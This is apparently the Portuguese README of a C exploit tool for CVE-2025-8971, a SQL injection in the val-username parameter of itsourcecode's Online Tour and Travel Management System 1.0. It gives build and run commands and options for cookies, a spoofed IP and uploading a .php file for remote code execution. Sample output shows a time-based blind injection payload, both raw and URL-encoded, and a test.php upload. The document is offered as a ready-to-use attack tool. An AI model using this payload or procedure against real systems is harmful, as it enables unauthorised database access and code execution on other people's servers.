
Injeção SQL no itsourcecode Online Tour and Travel Management System 1.0.
Autor: Byte Reaper
Este exploit para CVE-2025-8971, uma vulnerabilidade de injeção SQL no itsourcecode Online Tour and Travel Management System 1.0. A vulnerabilidade existe em /admin/operations/travellers.php e pode ser explorada remotamente através do parâmetro val-username.
Como funciona
O exploit envia requisições HTTP POST manipuladas para a URL alvo.
Os payloads são codificados e injetados em val-username.
Upload opcional de arquivo (.php ou imagem) pode ser usado para alcançar execução remota de código.
O script verifica as respostas para checar se o payload foi executado com sucesso.
GCC compiler (gcc)
Linux x86_64
ibcurl
gcc script.c argparse.c -o CVE-2025-8971 -lcurl
./CVE-2025-8971 -u http://<target> -v [verbose mode]
-h, --help mensagem de ajuda
-u, --url URL Alvo (URL BASE)
-c, --cookies Arquivo de cookies
-i, --ip IP Falso (requisição do Host)
-f, --file Upload de arquivo (.php / imagem)
-v, --verbose Modo Verbose
[+] Start encode Payload in Request (username=)
[+] Encode Payload : AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'b'='b'
[+] Original Payload (Not encode) : AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'b'='b'
[+] POST Request Sent
[+] FULL URL : http://127.0.0.1/code/admin/operations/travellers.php
[+] File Upload : test.php
[+] File written successfully
....
MIT License